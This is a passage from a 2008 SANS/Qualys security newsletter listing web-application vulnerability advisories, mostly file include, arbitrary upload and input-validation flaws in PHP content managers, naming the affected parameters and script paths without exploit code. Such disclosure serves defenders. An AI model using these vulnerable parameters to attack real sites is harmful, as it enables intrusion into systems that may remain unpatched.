"adodb-pear.inc.php". phpDMCA version 1.0.0 is affected.
Ref: http://www.securityfocus.com/bid/29880
______________________________________________________________________
08.26.115 CVE: Not Available
Platform: Web Application
Title: Open Digital Assets Repository System Remote File Include
Description: Open Digital Assets Repository System (ODARS) is a
web-based content and asset management system. The application is
exposed to a remote file include issue because it fails to
sufficiently sanitize user-supplied input to the
"CLASSES_ROOT=[SHELL]" parameter of the "resource_categories_view.php"
script. ODARS version 1.0.2 is affected.
Ref: http://www.securityfocus.com/bid/29881
______________________________________________________________________
08.26.116 CVE: Not Available
Platform: Web Application
Title: benja CMS Multiple Input Validation and Unauthorized Access
Vulnerabilities
Description: benja CMS is a PHP-based content manager. The application
is exposed to multiple input validation issues. Exploiting these
issues could allow an attacker to steal cookie-based authentication
credentials, have arbitrary script code execute in the context of the
application, or to access administrative scripts. benja CMS version
0.1 is affected.
Ref: http://www.securityfocus.com/archive/1/493568
______________________________________________________________________
08.26.117 CVE: Not Available
Platform: Web Application
Title: J00lean-CMS "includes/classes/page.php" Unspecified Remote Vulnerability
Description: J00lean-CMS is a PHP-based content manager. The
application is exposed to an unspecified issue that occurs in the
"includes/classes/page.php" script. J00lean-CMS version 1.03 is
affected.
Ref: http://sourceforge.net/project/shownotes.php?release_id=608171
______________________________________________________________________
08.26.118 CVE: Not Available
Platform: Web Application
Title: CMS Mini "view/index.php" Multiple Local File Include
Vulnerabilities
Description: CMS Mini is a PHP-based content manager. The application
is exposed to multiple local file include issues because it fails to
properly sanitize user-supplied input to the "path" and "p" parameters
of the "view/index.php" script. CMS Mini version 0.2.2 is affected.
Ref: http://www.securityfocus.com/bid/29890
______________________________________________________________________
08.26.119 CVE: Not Available
Platform: Web Application
Title: CMReams Cross-Site Scripting and Local File Include
Vulnerabilities
Description: CMReams is a content management application. The
application is exposed to multiple input validation issues. CMReams
version 1.3.1.1beta 2 is affected.
Ref: http://www.securityfocus.com/bid/29891
______________________________________________________________________
08.26.120 CVE: Not Available
Platform: Web Application
Title: emuCMS "upload.php" Arbitrary File Upload
Description: emuCMS is a PHP-based content manager. The application is
exposed to an issue that lets remote attackers upload and execute
arbitrary script code on an affected computer with the privileges of
the web server process. The issue occurs because the software fails to
properly sanitize user-supplied input to the "NewFile" parameter of
the "/admin/FCKeditor/editor/filemanager/upload/php/upload.php"
script. emuCMS version 0.3 is affected.
Ref: http://www.securityfocus.com/bid/29892
______________________________________________________________________
08.26.121 CVE: Not Available
Platform: Web Application
Title: BlogPHP "email" Parameter Privilege Escalation
Description: BlogPHP is a PHP-based blogging application. The
application is exposed to a privilege escalation issue because it
fails to adequately sanitize user-supplied input to the "email"
parameter during user registration. BlogPHP version 2.0 is affected.
Ref: http://www.securityfocus.com/bid/29898
______________________________________________________________________
08.26.122 CVE: Not Available
Platform: Web Application
Title: MyBlog Cross-Site Scripting and SQL Injection Vulnerabilities
Description: MyBlog is a PHP-based Blog/CMS application. Since it
fails to sufficiently sanitize user-supplied data, the application is
exposed to multiple input validation issues.
Ref: http://www.securityfocus.com/bid/29900
______________________________________________________________________
08.26.123 CVE: CVE-2008-2827
Platform: Web Application
Title: Joomla! and Mambo FacileForms Component "ff_compath" Parameter
rEmote File Include
Description: FacileForms is a PHP-based form creation component for
the Mambo and Joomla! content managers. The application is exposed to
a remote file include issue because it fails to sufficiently sanitize
user-supplied input to the "ff_compath" parameter of the
"com_facileforms/facileforms.frame.php" script. FacileForms version
1.4.4 is affected.
Ref: http://www.securityfocus.com/bid/29904
______________________________________________________________________
08.26.124 CVE: Not Available
Platform: Web Application
Title: Dagger "skins/default.php" Remote File Include
Description: Dagger is a content management system. The application is
exposed to a remote file include issue because it fails to
sufficiently sanitize user-supplied input to the "dir_inc" parameter
of the "skins/default.php" script.
Ref: http://www.securityfocus.com/bid/29906
______________________________________________________________________
08.26.125 CVE: Not Available
Platform: Web Application
Title: Ourvideo CMS Multiple Input Validation Vulnerabilities
Description: Ourvideo CMS is a media content manager. The application
is exposed to multiple input validation issues because it fails to adequately
sanitize user-supplied input. Ourvideo CMS version 9.5 is affected.
Ref: http://www.securityfocus.com/bid/29909
______________________________________________________________________
08.26.126 CVE: Not Available
Platform: Web Application
Title: cmsWorks "lib.module.php" Remote File Include
Description: cmsWorks is a content management solution. The
application is exposed to a remote file include issue because it fails
to properly sanitize user-supplied input to the "mod_root" parameter
of the "admin/include/lib.module.php/lib.module.php" script. cmsWorks
version 2.2 RC4 is affected.
Ref: http://www.securityfocus.com/bid/29911
______________________________________________________________________
08.26.127 CVE: Not Available
Platform: Web Application
Title: cmsWorks "config.php" Arbitrary File Upload
Description: cmsWorks is a web-based content manager. The application
is exposed to an issue that lets remote attackers upload and execute
arbitrary script code on an affected computer with the privileges of
the web server process. The issue occurs because the software fails to
properly sanitize user-supplied input in the form of file extensions
to the
"path/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php"
script. cmsWorks version 2.2 RC4 is affected.
Ref: http://www.securityfocus.com/bid/29914
______________________________________________________________________
08.26.128 CVE: Not Available
Platform: Web Application
Title: A+ PHP Scripts News Management System Multiple Input Validation
Vulnerabilities
Description: A+ PHP Scripts News Management System is a web-based
application. The application is exposed to multiple input validation
issues. News Management System version 0.3 is affected.
Ref: http://www.securityfocus.com/bid/29912
______________________________________________________________________
08.26.129 CVE: Not Available
Platform: Web Application
Title: Php F1 Max's Image Uploader "index.php" Arbitrary File Upload
Description: Max's Image Uploader is a PHP-based web application. The
application is exposed to an issue that lets remote attackers upload
and execute arbitrary code because it fails to properly sanitize
user-supplied files uploaded via the "index.php" script.
Ref: https://vuln.intranet.qualys.com:8443/sans/edit.php?id=26.50
______________________________________________________________________
(c) 2008. All rights reserved. The information contained in this
newsletter, including any external links, is provided "AS IS," with no
express or implied warranty, for informational purposes only. In some
cases, copyright for material in this newsletter may be held by a
party other than Qualys (as indicated herein) and permission to use
such material must be requested from the copyright owner.
Subscriptions: RISK is distributed free of charge by the SANS Institute
to people responsible for managing and securing information systems and
networks. You may forward this newsletter to others with such
responsibility inside or outside your organization.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAkhkPBwACgkQ+LUG5KFpTkaWRACfULIyr8pDEFLPKMtrILn9AXyK
3IUAoJD+LAr5fImmbpmGlHpakMGjFdpm
=0x0/
-----END PGP SIGNATURE-----
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]